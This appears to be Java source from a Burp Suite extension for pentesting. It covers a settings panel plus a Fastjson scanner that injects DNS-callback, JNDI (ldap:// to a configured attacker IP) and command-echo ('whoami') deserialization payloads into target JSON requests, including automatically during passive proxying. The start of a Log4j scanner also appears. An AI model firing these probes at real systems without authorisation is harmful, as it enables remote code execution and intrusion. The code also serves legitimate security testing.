configPanelTop.add(dnslogButton, new GridConstraints(1, 4, 1, 1,
GridConstraints.ANCHOR_CENTER, GridConstraints.FILL_HORIZONTAL,
GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_CAN_GROW,
GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false));
// IP配置行
ipLabel = new JLabel();
ipLabel.setText(I18nUtils.get("config.label.ip"));
configPanelTop.add(ipLabel, new GridConstraints(2, 0, 1, 1,
GridConstraints.ANCHOR_WEST, GridConstraints.FILL_NONE,
GridConstraints.SIZEPOLICY_FIXED, GridConstraints.SIZEPOLICY_FIXED,
null, null, null, 0, false));
ipTextField = new JTextField();
configPanelTop.add(ipTextField, new GridConstraints(2, 1, 1, 3,
GridConstraints.ANCHOR_WEST, GridConstraints.FILL_HORIZONTAL,
GridConstraints.SIZEPOLICY_WANT_GROW, GridConstraints.SIZEPOLICY_FIXED,
null, new Dimension(250, -1), null, 0, false));
ipButton = new JButton();
ipButton.setText(I18nUtils.get("config.button.save"));
configPanelTop.add(ipButton, new GridConstraints(2, 4, 1, 1,
GridConstraints.ANCHOR_CENTER, GridConstraints.FILL_HORIZONTAL,
GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_CAN_GROW,
GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false));
// 工具配置行
toolNameLabel = new JLabel();
toolNameLabel.setText(I18nUtils.get("config.label.tool_name"));
configPanelTop.add(toolNameLabel, new GridConstraints(3, 0, 1, 1,
GridConstraints.ANCHOR_WEST, GridConstraints.FILL_NONE,
GridConstraints.SIZEPOLICY_FIXED, GridConstraints.SIZEPOLICY_FIXED,
null, null, null, 0, false));
toolNameTextField = new JTextField();
configPanelTop.add(toolNameTextField, new GridConstraints(3, 1, 1, 1,
GridConstraints.ANCHOR_WEST, GridConstraints.FILL_HORIZONTAL,
GridConstraints.SIZEPOLICY_WANT_GROW, GridConstraints.SIZEPOLICY_FIXED,
null, new Dimension(150, -1), null, 0, false));
toolArgvLabel = new JLabel();
toolArgvLabel.setText(I18nUtils.get("config.label.tool_args"));
configPanelTop.add(toolArgvLabel, new GridConstraints(3, 2, 1, 1,
GridConstraints.ANCHOR_WEST, GridConstraints.FILL_NONE,
GridConstraints.SIZEPOLICY_FIXED, GridConstraints.SIZEPOLICY_FIXED,
null, null, null, 0, false));
toolArgvTextField = new JTextField();
configPanelTop.add(toolArgvTextField, new GridConstraints(3, 3, 1, 1,
GridConstraints.ANCHOR_WEST, GridConstraints.FILL_HORIZONTAL,
GridConstraints.SIZEPOLICY_WANT_GROW, GridConstraints.SIZEPOLICY_FIXED,
null, new Dimension(250, -1), null, 0, false));
toolButton = new JButton();
toolButton.setText(I18nUtils.get("config.button.save"));
configPanelTop.add(toolButton, new GridConstraints(3, 4, 1, 1,
GridConstraints.ANCHOR_CENTER, GridConstraints.FILL_HORIZONTAL,
GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_CAN_GROW,
GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false));
// 按钮行
JPanel buttonPanel = new JPanel();
buttonPanel.setLayout(new FlowLayout(FlowLayout.LEFT, 10, 5)); // 使用FlowLayout,左对齐,间距10
configPanelTop.add(buttonPanel, new GridConstraints(4, 0, 1, 9,
GridConstraints.ANCHOR_WEST, GridConstraints.FILL_HORIZONTAL,
GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_CAN_GROW,
GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false));
refershButton = new JButton();
refershButton.setText(I18nUtils.get("config.button.refresh"));
buttonPanel.add(refershButton);
deleteSelectButton = new JButton();
deleteSelectButton.setText(I18nUtils.get("config.button.delete"));
buttonPanel.add(deleteSelectButton);
clearCacheButton = new JButton();
clearCacheButton.setText(I18nUtils.get("config.button.clear_cache"));
buttonPanel.add(clearCacheButton);
// 新增按钮
resetUrl = new JButton(I18nUtils.get("config.button.reset"));
buttonPanel.add(resetUrl);
// 配置下部面板(表格)
configPanelDown = new JPanel();
configPanelDown.setLayout(new GridLayoutManager(1, 1, new Insets(10, 10, 10, 10), -1, -1));
configPanel.add(configPanelDown, BorderLayout.CENTER);
configPanelDownJscrollPanel = new JScrollPane();
configPanelDown.add(configPanelDownJscrollPanel, new GridConstraints(0, 0, 1, 1,
GridConstraints.ANCHOR_CENTER, GridConstraints.FILL_BOTH,
GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_WANT_GROW,
GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_WANT_GROW,
null, null, null, 0, false));
configTable = new JTable(dataModel);
configTable.setRowHeight(25); // 设置表格行高
configTable.setFillsViewportHeight(true); // 表格填充视窗
configPanelDownJscrollPanel.setViewportView(configTable);
}
private void setupData() {
ConfigBean dnsconfig = getConfig("config", "dnslog");
dnslogTextField.setText(dnsconfig.getValue());
ConfigBean ipconfig = getConfig("config", "ip");
ipTextField.setText(ipconfig.getValue());
toolNameTextField.setText("sqlmap");
toolArgvTextField.setText("python sqlmap.py -r {request} -u {url} -h {host}");
List<ConfigBean> toolParam = getToolConfig();
for (ConfigBean config : toolParam) {
addData(config.getType(), config.getValue());
}
refershButton.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
List<ConfigBean> toolParam = getToolConfig();
data.clear();
for (ConfigBean config : toolParam) {
addData(config.getType(), config.getValue());
}
dataModel.fireTableDataChanged();
}
});
deleteSelectButton.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
int[] selectedRows = configTable.getSelectedRows();
for (int i = selectedRows.length - 1; i >= 0; i--) {
int selectedRow = selectedRows[i];
String type = (String) configTable.getValueAt(selectedRow, 1);
deleteToolConfig(type);
data.remove(selectedRow);
dataModel.fireTableRowsDeleted(selectedRow, selectedRow);
dataModel.fireTableDataChanged();
}
}
});
clearCacheButton.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
// mark
// 弹出提示框
boolean deleteReqFile = Utils.deleteReqFile();
if (deleteReqFile){
JOptionPane.showMessageDialog(null, I18nUtils.get("config.message.delete_success"), I18nUtils.get("config.title.info"), JOptionPane.INFORMATION_MESSAGE);
}else {
JOptionPane.showMessageDialog(null, I18nUtils.get("config.message.delete_failed"), I18nUtils.get("config.title.info"), JOptionPane.INFORMATION_MESSAGE);
}
}
});
dnslogButton.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
String module = "config";
String dns = dnslogTextField.getText();
ConfigBean config = new ConfigBean(module, "dnslog", dns);
saveConfig(config);
FastjsonUI.dnslog = dns;
Log4jUI.dns = dns;
// 弹窗提示
JOptionPane.showMessageDialog(null, I18nUtils.get("config.message.save_success"), I18nUtils.get("config.title.info"), JOptionPane.INFORMATION_MESSAGE);
}
});
ipButton.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
String module = "config";
String ip = ipTextField.getText();
ConfigBean config = new ConfigBean(module, "ip", ip);
saveConfig(config);
FastjsonUI.ip = ip;
Log4jUI.ip = ip;
JOptionPane.showMessageDialog(null, I18nUtils.get("config.message.save_success"), I18nUtils.get("config.title.info"), JOptionPane.INFORMATION_MESSAGE);
}
});
toolButton.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
String module = "tool";
String type = toolNameTextField.getText();
String value = toolArgvTextField.getText();
ConfigBean config = new ConfigBean(module, type, value);
saveConfig(config);
addData(type, value);
JOptionPane.showMessageDialog(null, I18nUtils.get("config.message.save_success"), I18nUtils.get("config.title.info"), JOptionPane.INFORMATION_MESSAGE);
}
});
resetUrl.addActionListener(new ActionListener() {
@Override
public void actionPerformed(ActionEvent e) {
UrlCacheUtil.resetAllCaches();
RouteUI.resetAllCaches();
PermUI.resetAllCaches();
Log4jUI.resetAllCaches();
FastjsonUI.resetAllCaches();
SqlUI.resetAllCaches();
JOptionPane.showMessageDialog(null, I18nUtils.get("config.message.reset_success"), I18nUtils.get("config.title.info"), JOptionPane.INFORMATION_MESSAGE);
}
});
// 语言选择监听器
languageComboBox.addActionListener(new ActionListener() {
@Override
public void actionPerformed(ActionEvent e) {
String selectedLanguage = (String) languageComboBox.getSelectedItem();
boolean isChinese = selectedLanguage.equals("中文");
I18nUtils.setChinese(isChinese);
// 保存语言设置到配置
String module = "config";
String key = "language";
String value = isChinese ? "zh" : "en";
ConfigBean config = new ConfigBean(module, key, value);
saveConfig(config);
// 提示用户重启插件以应用语言更改
JOptionPane.showMessageDialog(null, I18nUtils.get("common.message.language_change"), I18nUtils.get("common.title.info"), JOptionPane.INFORMATION_MESSAGE);
}
});
}
// 添加数据
public void addData(String key, String value) {
synchronized (data) {
data.add(new LogEntry(data.size() + 1, key, value));
dataModel.fireTableDataChanged();
dataModel.fireTableRowsInserted(data.size() - 1, data.size() - 1);
}
}
@Override
public void init() {
setupUI();
setupData();
}
@Override
public JPanel getPanel(IBurpExtenderCallbacks callbacks) {
return panel;
}
@Override
public String getTabName() {
return "Setting";
}
// 表格模型
static class ConfigModel extends AbstractTableModel {
@Override
public int getRowCount() {
return data.size();
}
@Override
public int getColumnCount() {
return 3;
}
@Override
public Object getValueAt(int rowIndex, int columnIndex) {
LogEntry dataEntry = data.get(rowIndex);
switch (columnIndex) {
case 0:
return dataEntry.id;
case 1:
return dataEntry.key;
case 2:
return dataEntry.value;
default:
return null;
}
}
@Override
public String getColumnName(int column) {
switch (column) {
case 0:
return "id";
case 1:
return "key";
case 2:
return "value";
default:
return null;
}
}
}
// 表格实体类
public static class LogEntry {
private final String key;
private final String value;
private int id;
public LogEntry(int id, String key, String value) {
this.id = id;
this.key = key;
this.value = value;
}
public LogEntry(String key, String value) {
this.key = key;
this.value = value;
}
}
}
================================================
FILE: src/main/java/burp/ui/FastjsonUI.java
================================================
package burp.ui;
import burp.*;
import burp.bean.FastjsonBean;
import burp.utils.CustomScanIssue;
import burp.utils.I18nUtils;
import burp.utils.JsonUtils;
import burp.utils.UrlCacheUtil;
import burp.utils.Utils;
import javax.swing.*;
import javax.swing.table.AbstractTableModel;
import javax.swing.table.DefaultTableCellRenderer;
import javax.swing.table.TableColumnModel;
import javax.swing.table.TableModel;
import java.awt.*;
import java.awt.event.ActionEvent;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.ArrayList;
import java.util.Iterator;
import java.util.List;
import java.util.Objects;
import java.util.concurrent.locks.Lock;
import java.util.concurrent.locks.ReentrantLock;
import static burp.dao.ConfigDao.getConfig;
import static burp.dao.FastjsonDao.getFastjsonListsByType;
/**
* @Author Xm17
* @Date 2024-06-22 12:13
*/
public class FastjsonUI implements UIHandler, IMessageEditorController , IHttpListener{
private JPanel panel; // 主面板
private JTabbedPane fastjsonreq; // 请求面板
private JTabbedPane fastjsonresp; // 响应面板
private JButton btnClear; // 清空按钮
private JButton btnRefresh; // 添加刷新按钮
private static volatile boolean autoRefresh = true; // 控制是否自动刷新
private static final Object refreshLock = new Object();
private JCheckBox autoRefreshCheckBox; // 自动刷新开关
private static JTable fastjsonTable; // fastjson表格
private IHttpRequestResponse currentlyDisplayedItem; // 当前显示的请求
private JCheckBox passiveScanCheckBox; // 添加被动扫描复选框
private IMessageEditor HRequestTextEditor; // 请求编辑器
private IMessageEditor HResponseTextEditor; // 响应编辑器
private static final List<FastjsonEntry> fastjsonlog = new ArrayList<>(); // fastjson日志
public static String dnslog; // dnslog地址
public static String ip; // ip地址
private static List<FastjsonBean> jndiPayloads = new ArrayList<>(); // jndi payloads
private static List<FastjsonBean> versionPayloads = new ArrayList<>(); // jndi payloads
private static List<FastjsonBean> dnsPayloads = new ArrayList<>(); // jndi payloads
private static List<FastjsonBean> echoPayloads = new ArrayList<>(); // jndi payloads
private static final Lock lock = new ReentrantLock();
private boolean isPassiveScanEnabled = false; // 控制被动扫描状态
public static void resetAllCaches() {
UrlCacheUtil.resetCache("fastjson");
}
@Override
public IHttpService getHttpService() {
return currentlyDisplayedItem.getHttpService();
}
@Override
public byte[] getRequest() {
return currentlyDisplayedItem.getRequest();
}
@Override
public byte[] getResponse() {
return currentlyDisplayedItem.getResponse();
}
@Override
public void init() {
dnslog = getConfig("config", "dnslog").getValue();
ip = getConfig("config", "ip").getValue();
jndiPayloads = getFastjsonListsByType("jndi");
versionPayloads = getFastjsonListsByType("version");
dnsPayloads = getFastjsonListsByType("dns");
echoPayloads = getFastjsonListsByType("echo");
setupUI();
setupData();
// 注册HTTP监听器
Utils.callbacks.registerHttpListener(this);
}
// 初始化数据
private void setupData() {
// 清空按钮事件
btnClear.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
fastjsonlog.clear();
UrlCacheUtil.resetCache("fastjson"); // 清空URL缓存
HRequestTextEditor.setMessage(new byte[0], true);
HResponseTextEditor.setMessage(new byte[0], false);
refreshTable();
}
});
// 刷新按钮事件
btnRefresh.addActionListener(new AbstractAction() {
@Override
public void actionPerformed(ActionEvent e) {
refreshTable();
}
});
// 自动刷新开关事件
autoRefreshCheckBox.addActionListener(e -> {
setAutoRefresh(autoRefreshCheckBox.isSelected());
if(autoRefreshCheckBox.isSelected()) {
refreshTable(); // 当开启自动刷新时,立即进行一次刷新
}
});
// 添加被动扫描复选框事件监听
passiveScanCheckBox.addActionListener(e -> {
isPassiveScanEnabled = passiveScanCheckBox.isSelected();
});
}
// 刷新表格方法
private static void refreshTable() {
SwingUtilities.invokeLater(() -> {
if(fastjsonTable != null) {
((AbstractTableModel)fastjsonTable.getModel()).fireTableDataChanged();
}
});
}
// 初始化UI
private void setupUI() {
panel = new JPanel();
panel.setLayout(new BorderLayout());
// 顶部面板添加清空按钮和被动扫描复选框
JPanel topPanel = new JPanel(new FlowLayout(FlowLayout.LEFT));
btnClear = new JButton(I18nUtils.get("fastjson.button.clear"));
passiveScanCheckBox = new JCheckBox(I18nUtils.get("fastjson.checkbox.passive_scan"));
btnRefresh = new JButton(I18nUtils.get("fastjson.button.refresh"));
autoRefreshCheckBox = new JCheckBox(I18nUtils.get("fastjson.checkbox.auto_refresh"));
autoRefreshCheckBox.setSelected(true); // 默认开启自动刷新
topPanel.add(btnClear);
topPanel.add(btnRefresh);
topPanel.add(autoRefreshCheckBox);
topPanel.add(passiveScanCheckBox);
panel.add(topPanel, BorderLayout.NORTH);
// 上下分割面板,比例是7:3
JSplitPane mainsplitPane = new JSplitPane(JSplitPane.VERTICAL_SPLIT);
mainsplitPane.setResizeWeight(0.7);
mainsplitPane.setDividerLocation(0.7);
// 添加URLTable到mainsplitPane的上边
fastjsonTable = new URLTable(new FastjsonModel());
JScrollPane scrollPane = new JScrollPane(fastjsonTable);
mainsplitPane.setTopComponent(scrollPane);
// 创建一个自定义的单元格渲染器
DefaultTableCellRenderer renderer = new DefaultTableCellRenderer() {
@Override
public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) {
JLabel label = (JLabel) super.getTableCellRendererComponent(table, value, isSelected, hasFocus, row, column);
label.setHorizontalAlignment(JLabel.CENTER);
label.setHorizontalTextPosition(JLabel.CENTER);
label.setIconTextGap(0);
label.setMaximumSize(new Dimension(Integer.MAX_VALUE, label.getPreferredSize().height));
label.setToolTipText((String) value); // 设置鼠标悬停时显示的提示文本
return label;
}
};
fastjsonTable.getColumnModel().getColumn(5).setCellRenderer(renderer);
// 左右分割面板,对称分割
JSplitPane splitPaneDown = new JSplitPane(JSplitPane.HORIZONTAL_SPLIT);
splitPaneDown.setResizeWeight(0.5);
splitPaneDown.setDividerLocation(0.5);
// 添加请求响应到左右分割面板
fastjsonreq = new JTabbedPane();
HRequestTextEditor = Utils.callbacks.createMessageEditor(FastjsonUI.this, true);
fastjsonreq.addTab("Request", HRequestTextEditor.getComponent());
fastjsonresp = new JTabbedPane();
HResponseTextEditor = Utils.callbacks.createMessageEditor(FastjsonUI.this, false);
fastjsonresp.addTab("Response", HResponseTextEditor.getComponent());
splitPaneDown.setLeftComponent(fastjsonreq);
splitPaneDown.setRightComponent(fastjsonresp);
// 添加splitPaneDown到mainsplitPane的下边
mainsplitPane.setBottomComponent(splitPaneDown);
panel.add(mainsplitPane, BorderLayout.CENTER);
}
@Override
public JPanel getPanel(IBurpExtenderCallbacks callbacks) {
return panel;
}
@Override
public String getTabName() {
return "Fastjson";
}
// dnslog检测
public void CheckDnslog(IHttpRequestResponse[] responses) {
lock.lock();
try{
IHttpRequestResponse baseRequestResponse = responses[0];
IRequestInfo analyzeRequest = Utils.helpers.analyzeRequest(baseRequestResponse);
String extensionMethod = analyzeRequest.getMethod();
URL dnsurl = analyzeRequest.getUrl();
String url = analyzeRequest.getUrl().toString();
List<String> headers = Utils.helpers.analyzeRequest(baseRequestResponse).getHeaders();
String res = "dnslog检测,请查看dnslog服务器";
IHttpService iHttpService = baseRequestResponse.getHttpService();
for (FastjsonBean fastjson : dnsPayloads) {
String fastjsonDnslog = fastjson.getValue();
String dnslogPayload = Utils.generateDnsPayload(dnsurl, dnslog);
String fuzzPayload = fastjsonDnslog.replace("FUZZ", dnslogPayload);
String jsonPayload = JsonUtils.encodeToJsonRandom(fuzzPayload);
byte[] bytePayload = Utils.helpers.stringToBytes(jsonPayload);
byte[] postMessage = Utils.helpers.buildHttpMessage(headers, bytePayload); // 目前只支持post
IHttpRequestResponse resp = Utils.callbacks.makeHttpRequest(iHttpService, postMessage);
IResponseInfo iResponseInfo = Utils.callbacks.getHelpers().analyzeResponse(resp.getResponse());
String statusCode = String.valueOf(iResponseInfo.getStatusCode());
add(extensionMethod, url, statusCode, res, fuzzPayload,resp);
}
}finally {
lock.unlock();
}
}
// echo命令检测
public void CheckEchoVul(IHttpRequestResponse[] responses) {
lock.lock();
try{
IHttpRequestResponse baseRequestResponse = responses[0];
IRequestInfo analyzeRequest = Utils.helpers.analyzeRequest(baseRequestResponse);
String extensionMethod = analyzeRequest.getMethod();
String url = analyzeRequest.getUrl().toString();
List<String> headers = Utils.helpers.analyzeRequest(baseRequestResponse).getHeaders();
// 弹出一个输入框,用于获取用户输入的dnslog地址
String defaultValue = "whoami";
String echoVul = (String) JOptionPane.showInputDialog(null, I18nUtils.get("fastjson.message.enter_echo"), I18nUtils.get("config.title.info"), JOptionPane.PLAIN_MESSAGE, null, null, defaultValue);
if (echoVul == null){
JOptionPane.showMessageDialog(null, I18nUtils.get("fastjson.message.enter_echo"), I18nUtils.get("config.title.info"), JOptionPane.ERROR_MESSAGE);
return;
}
IHttpService iHttpService = baseRequestResponse.getHttpService();
Iterator<FastjsonBean> iterator = echoPayloads.iterator();
headers.add("Accept-Cache: " + echoVul);
while (iterator.hasNext()) {
FastjsonBean fastjson = iterator.next();
String fastjsonEcho = fastjson.getValue();
byte[] bytePayload = Utils.helpers.stringToBytes(fastjsonEcho);
byte[] postMessage = Utils.helpers.buildHttpMessage(headers, bytePayload); // 目前只支持post
IHttpRequestResponse resp = Utils.callbacks.makeHttpRequest(iHttpService, postMessage);
IResponseInfo iResponseInfo = Utils.callbacks.getHelpers().analyzeResponse(resp.getResponse());
String statusCode = String.valueOf(iResponseInfo.getStatusCode());
List<String> headersResp = iResponseInfo.getHeaders();
boolean containsContentAuth = false;
for (String header : headersResp) {
if (header.contains("Content-auth")) {
containsContentAuth = true;
break;
}
}
if (containsContentAuth) {
add(extensionMethod, url, statusCode, "echo命令检测完成,发现结果",fastjsonEcho, resp);
IScanIssue issues = null;
try {
issues = new CustomScanIssue(iHttpService, new URL(url), new IHttpRequestResponse[]{resp},
"Fastjson echo", "Fastjson echo命令检测完成,发现结果",
"High", "Certain");
Utils.callbacks.addScanIssue(issues);
} catch (MalformedURLException e) {
throw new RuntimeException(e);
}
} else {
add(extensionMethod, url, statusCode, "echo命令检测完成,未发现结果",fastjsonEcho, resp);
}
}
}finally {
lock.unlock();
}
}
// jndi检测
public void CheckJNDIVul(IHttpRequestResponse[] responses) {
lock.lock();
try {
IHttpRequestResponse baseRequestResponse = responses[0];
IRequestInfo analyzeRequest = Utils.helpers.analyzeRequest(baseRequestResponse);
String extensionMethod = analyzeRequest.getMethod();
String url = analyzeRequest.getUrl().toString();
List<String> headers = Utils.helpers.analyzeRequest(baseRequestResponse).getHeaders();
try {
String jndiStr = "";
String defaultValue = "IP"; // 设置默认值
String[] options = {"DNS", "IP"}; // 单选框选项
String selectedValue = (String) JOptionPane.showInputDialog(null, I18nUtils.get("fastjson.dialog.select_type"), I18nUtils.get("fastjson.dialog.tip"),
JOptionPane.PLAIN_MESSAGE, null, options, defaultValue);
if (Objects.equals(selectedValue, "DNS")) {
jndiStr = dnslog;
}
if (Objects.equals(selectedValue, "IP")) {
jndiStr = ip;
}
IHttpService iHttpService = baseRequestResponse.getHttpService();
for (FastjsonBean payload : jndiPayloads) {
String dnslogKey = "";
String fastjsonJNDI = payload.getValue();
String id = String.valueOf(payload.getId());
if (selectedValue.equals("DNS")) {
dnslogKey = "ldap://" + id + "." + jndiStr;
} else {
dnslogKey = "ldap://" + jndiStr + "/" + id;
}
String fuzzPayload = fastjsonJNDI.replace("FUZZ", dnslogKey);
String jsonPayload = JsonUtils.encodeToJsonRandom(fuzzPayload);
byte[] bytePayload = Utils.helpers.stringToBytes(jsonPayload);
byte[] postMessage = Utils.helpers.buildHttpMessage(headers, bytePayload); // 目前只支持post
IHttpRequestResponse resp = Utils.callbacks.makeHttpRequest(iHttpService, postMessage);
IResponseInfo iResponseInfo = Utils.callbacks.getHelpers().analyzeResponse(resp.getResponse());
String statusCode = String.valueOf(iResponseInfo.getStatusCode());
add(extensionMethod, url, statusCode, "jndi检测完成,请查看服务器",fuzzPayload, resp);
}
} catch (Exception e) {
Utils.stderr.println(e.getMessage());
}
}finally {
lock.unlock();
}
}
// version检测
public void CheckVersion(IHttpRequestResponse[] responses) {
lock.lock();
try{
IHttpRequestResponse baseRequestResponse = responses[0];
IRequestInfo analyzeRequest = Utils.helpers.analyzeRequest(baseRequestResponse);
String extensionMethod = analyzeRequest.getMethod();
String url = analyzeRequest.getUrl().toString();
List<String> headers = Utils.helpers.analyzeRequest(baseRequestResponse).getHeaders();
IHttpService iHttpService = baseRequestResponse.getHttpService();
for (FastjsonBean fastjson : versionPayloads) {
String fastjsonVersion = fastjson.getValue();
byte[] bytePayload = Utils.helpers.stringToBytes(fastjsonVersion);
byte[] postMessage = Utils.helpers.buildHttpMessage(headers, bytePayload); // 目前只支持post
IHttpRequestResponse resp = Utils.callbacks.makeHttpRequest(iHttpService, postMessage);
IResponseInfo iResponseInfo = Utils.callbacks.getHelpers().analyzeResponse(resp.getResponse());
String statusCode = String.valueOf(iResponseInfo.getStatusCode());
add(extensionMethod, url, statusCode, "version检测完成,请查看返回包",fastjsonVersion, resp);
}
}finally {
lock.unlock();
}
}
// 添加日志
private static void add(String extensionMethod, String url, String status, String res,String req, IHttpRequestResponse baseRequestResponse) {
synchronized (fastjsonlog) {
int id = fastjsonlog.size();
fastjsonlog.add(new FastjsonEntry(id, extensionMethod, url, status, res,req, baseRequestResponse));
// 只保留refreshTable即可,删除updateUI
if(autoRefresh) {
refreshTable();
}
}
}
public static void setAutoRefresh(boolean value) {
synchronized (refreshLock) {
autoRefresh = value;
}
}
@Override
public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse messageInfo) {
// 只处理被动扫描启用、响应包、且来自代理或Spider的请求
if (!isPassiveScanEnabled || messageIsRequest ||
(toolFlag != IBurpExtenderCallbacks.TOOL_PROXY &&
toolFlag != IBurpExtenderCallbacks.TOOL_SPIDER)) {
return;
}
IRequestInfo requestInfo = Utils.helpers.analyzeRequest(messageInfo);
URL infoUrl = requestInfo.getUrl();
String url = requestInfo.getUrl().toString();
String method = requestInfo.getMethod();
List<String> headers = requestInfo.getHeaders();
// 检查是否为静态资源
if (Utils.isUrlBlackListSuffix(url)) {
return;
}
// 检查是否重复
if (!UrlCacheUtil.checkUrlUnique("fastjson", method, infoUrl, new ArrayList<>())) {
return;
}
// 检查是否为POST请求且Content-Type为JSON
if (!"POST".equalsIgnoreCase(method)) {
return;
}
boolean isJson = false;
for (String header : headers) {
if (header.toLowerCase().contains("content-type") &&
header.toLowerCase().contains("application/json")) {
isJson = true;
break;
}
}
if (!isJson) {
return;
}
// 进行Fastjson被动扫描测试
performPassiveScan(messageInfo);
}
// 执行被动扫描测试
private void performPassiveScan(IHttpRequestResponse baseRequestResponse) {
try {
IRequestInfo analyzeRequest = Utils.helpers.analyzeRequest(baseRequestResponse);
String url = analyzeRequest.getUrl().toString();
String method = analyzeRequest.getMethod();
List<String> headers = analyzeRequest.getHeaders();
IHttpService httpService = baseRequestResponse.getHttpService();
URL dnsurl = analyzeRequest.getUrl();
// 使用dnslog payload进行测试
for (FastjsonBean fastjson : dnsPayloads) {
String fastjsonDnslog = fastjson.getValue();
String dnslogPayload = Utils.generateDnsPayload(dnsurl, dnslog);
String fuzzPayload = fastjsonDnslog.replace("FUZZ", dnslogPayload);
String jsonPayload = JsonUtils.encodeToJsonRandom(fuzzPayload);
byte[] bytePayload = Utils.helpers.stringToBytes(jsonPayload);
byte[] postMessage = Utils.helpers.buildHttpMessage(headers, bytePayload);
IHttpRequestResponse resp = Utils.callbacks.makeHttpRequest(httpService, postMessage);
IResponseInfo responseInfo = Utils.helpers.analyzeResponse(resp.getResponse());
String statusCode = String.valueOf(responseInfo.getStatusCode());
// 记录扫描结果
add(method, url, statusCode, "被动扫描DNS检测", fuzzPayload, resp);
}
} catch (Exception e) {
Utils.stderr.println("Passive scan error: " + e.getMessage());
}
}
private static class FastjsonModel extends AbstractTableModel {
@Override
public int getRowCount() {
synchronized (fastjsonlog) {
return fastjsonlog.size();
}
}
@Override
public int getColumnCount() {
return 6;
}
@Override
public Object getValueAt(int rowIndex, int columnIndex) {
synchronized (fastjsonlog) {
if (rowIndex >= 0 && rowIndex < fastjsonlog.size()) {
FastjsonEntry logEntry = fastjsonlog.get(rowIndex);
switch (columnIndex) {
case 0: return logEntry.id;
case 1: return logEntry.extensionMethod;
case 2: return logEntry.url;
case 3: return logEntry.status;
case 4: return logEntry.res;
case 5: return logEntry.req;
default: return "";
}
}
return "";
}
}
@Override
public String getColumnName(int column) {
switch (column) {
case 0:
return "id";
case 1:
return "method";
case 2:
return "url";
case 3:
return "status";
case 4:
return "res";
case 5:
return "req";
default:
return "";
}
}
}
private static class FastjsonEntry {
final int id;
final String extensionMethod;
final String url;
final String status;
final String res;
final String req;
final IHttpRequestResponse requestResponse;
private FastjsonEntry(int id, String extensionMethod, String url, String status, String res,String req, IHttpRequestResponse requestResponse) {
this.id = id;
this.extensionMethod = extensionMethod;
this.url = url;
this.status = status;
this.res = res;
this.req = req;
this.requestResponse = requestResponse;
}
}
private class URLTable extends JTable {
public URLTable(TableModel tableModel) {
super(tableModel);
TableColumnModel columnModel = getColumnModel();
columnModel.getColumn(0).setMaxWidth(50);
columnModel.getColumn(5).setMaxWidth(250);
}
@Override
public void changeSelection(int row, int col, boolean toggle, boolean extend) {
FastjsonEntry logEntry = fastjsonlog.get(row);
HRequestTextEditor.setMessage(logEntry.requestResponse.getRequest(), true);
if (logEntry.requestResponse.getResponse() == null) {
HResponseTextEditor.setMessage(new byte[0], false);
} else {
HResponseTextEditor.setMessage(logEntry.requestResponse.getResponse(), false);
}
currentlyDisplayedItem = logEntry.requestResponse;
super.changeSelection(row, col, toggle, extend);
}
}
}
================================================
FILE: src/main/java/burp/ui/Log4jUI.java
================================================
package burp.ui;
import burp.*;
import burp.bean.Log4jBean;
import burp.ui.UIHepler.GridBagConstraintsHelper;
import burp.utils.I18nUtils;
import burp.utils.JsonUtils;
import burp.utils.Utils;
import burp.utils.UrlCacheUtil;
import com.alibaba.fastjson.JSON;
import javax.swing.*;
import javax.swing.table.AbstractTableModel;
import javax.swing.table.TableColumnModel;
import javax.swing.table.TableModel;
import java.awt.*;
import java.awt.event.ActionEvent;
import java.net.URL;
import java.util.List;
import java.util.*;
import java.util.concurrent.locks.Lock;
import java.util.concurrent.locks.ReentrantLock;
import static burp.IParameter.*;
import static burp.dao.ConfigDao.getConfig;
import static burp.dao.Log4jDao.*;
/**
* @Author Xm17
* @Date 2024-06-22 12:45
*/
public class Log4jUI implements UIHandler, IMessageEditorController, IHttpListener {
private JPanel panel; // 主面板
private static JTable log4jtable; // log4j表格
private JCheckBox passiveScanCheckBox; // 被动扫描选择框
private JCheckBox originalValueCheckBox; // 原始payload值选择框
private JCheckBox checkHeaderCheckBox; // 检测header选择框
private JCheckBox isDnsOrIpCheckBox; // 是否是dns或者ip选择框
private JCheckBox checkWhiteListCheckBox; // 白名单域名检测选择框
private JCheckBox checkParmamCheckBox; // 检测参数选择框
private JButton saveWhiteListButton; // 保存白名单域名按钮
private JButton saveHeaderListButton; // 保存header按钮
private JButton savePayloadButton; // 保存log4j payload按钮
private JButton refreshTableButton; // 刷新表格按钮
private JButton clearTableButton;// 清空表格按钮
private JTextArea whiteListTextArea; // 白名单域名输入框
private JTextArea headerTextArea; // header输入框
private JTextArea payloadTextArea; // payload输入框
private JTabbedPane tabbedPanereq; // 请求tab
private JTabbedPane tabbedPaneresp; // 响应tab
private JScrollPane urltablescrollpane; // url table scroll pane
private IHttpRequestResponse currentlyDisplayedItem; // currently displayed item
private IMessageEditor HRequestTextEditor; // request editor
private IMessageEditor HResponseTextEditor; // response editor
private static final List<Log4jEntry> log4jlog = new ArrayList<>();
private static final List<String> parameterList = new ArrayList<>(); // 参数列表
private static final List<String> urlHashList = new ArrayList<>(); // url hash list
private static boolean isPassiveScan; // 是否是被动扫描
private static boolean isOriginalValue; // 是否删除原始值
private static boolean isCheckHeader; // 是否检测header
